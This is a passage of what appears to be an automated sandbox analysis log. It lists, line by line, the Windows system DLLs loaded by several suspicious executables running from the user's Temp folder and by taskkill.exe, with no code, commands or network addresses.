Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
